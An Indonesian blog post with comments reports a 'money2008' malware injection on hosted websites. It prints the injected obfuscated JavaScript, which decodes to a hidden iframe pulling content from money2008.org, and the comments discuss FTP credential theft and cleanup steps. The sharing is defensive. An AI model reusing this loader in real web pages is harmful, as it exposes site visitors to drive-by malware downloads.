beberapa waktu lalu satu situs yang sempat saya kelola dan situs kawan saya terkena injeksi malware money2008. Entah bagaimana caranya tiba-tiba pada beberapa file terdapat tambahan baris script sebagi berikut :
//ke83jcnsWWdo403
<script type=”text/javascript”>rnfunctionCC70475059E00529BB593C9C20A(B8F4CAE98748092E8E6367F05FCF){function
C1826F692BFD1CF8913C37(){return
16;}return(parseInt(B8F4CAE98748092E8E6367F05FCF,C1826F692BFD1CF8913C37()));}function
B07B56FF7E3F2F514C65E(A580CA29C93E1C0E53A06693ABB){var CB9AED6DBA318389BBCCF9498DF22=2;var
C32DC468C68BC65AF2A58AE9E4BAC=””;for(B5D436DCF02E51628012=0;B5D436DCF02E51628012<A580CA29C93E1
C0E53A06693ABB.length;B5D436DCF02E51628012+=CB9AED6DBA318389BBCCF9498DF22){C32DC468C68BC65AF2A58
AE9E4BAC+=(String.fromCharCode(CC70475059E00529BB593C9C20A(A580CA29C93E1C0E53A06693ABB.substr(B5
D436DCF02E51628012,CB9AED6DBA318389BBCCF9498DF22))));}document.write(C32DC468C68BC65AF2A58AE9E4B
AC);}B07B56FF7E3F2F514C65E(“3C696672616D65207372633D22687474703A2F2F6D6F6E6579323030382E6F72672
F746D702F222077696474683D31206865696768743D31207374796C653D227669736962696C6974793A68696464656E3
B706F736974696F6E3A6162736F6C757465223E3C2F696672616D653E”);rn</script>
Script diatas secara otomatis akan melakukan akses pada domain money2008.org
untuk situs yang pertama yaitu situs yang saya kelola tidak masalah karena tidak sampai 90 hari script tsb saya temukan (atas laporan pemilik situs) dan saya remove, tapi yang parah terjadi pada situs kawan saya sehingga pada waktu itu sampai diblokir oleh google/stopbadware.org untungnya segera di remove dan setelah 2 hari melaporkan review ulang terhadap situs teman saya tsb akhirnya sekarang kembali normal.
malware ini dikenali oleh AVG sebagai JS/Downloader
weleh-weleh…
dan solusinya bgmana pak?
sementara belum ada solusi selain mencari posisi script dan selanjutnya dihapus secara manual. mungkin ad ayg punya solusinya?
Solusinya sementara ini adalah, download seluruh folder di bawah public_html, kemudian scan dengan AVG, dan upload ulang kembali..
pak hadi, script itu mirip kaya injeksi iframe kemaren yach..
setelah saya cari info kemana mana penyebabnya adalah (yang saya alami) : komputer saya terkena virus yang menginfeksi file exe (yg oleh kspersky dinamai Virus.Win32.Sality). Nah kecurigaan saya berdasar info yang saya dapat, virus tersebut bisa mencuri username dan password ftp. Lha kalo pasword ama username udah didapat ya mau apa lagi…apapun bisa dilakukan kalao mau ama sang pencuri.
Kalau udah tau penyebabnya sekarang kan gampang ngatasinya. Install aja antivirus dan update terus.
Trus pencegahan yang saya lakukan yang kedua adalah mengubah cmod file index.php atau index.htm menjadi 444.
setelah itu kok sampe sekarang aman aman saja. Nggak tau ya kalo emang si hacker lagi males ngerjain lagi he hehe…
betul sekali bos, beberapa info mengatakan ini dari PC kita yang terinfesi virus selanjutnya masuk waktu kita melakukan transfer file menggunakan FTP. tapi ngga males kali bos mungkin sudah lupa ama password nya FTP milik bos.Alim hehehehe
mas…
saya lgi ada masalha yg sama seperti kasus money2008.org d atas
tapi saya masih bingung
bgmn cara kita mengetahui bahwa script di atas adalah script yg me-load situs money2008.org
coz sampe sekarang saya belum bisa tahu scriptny yg mana,, untuk di hapus segera
thanks ats respon dan bantuannya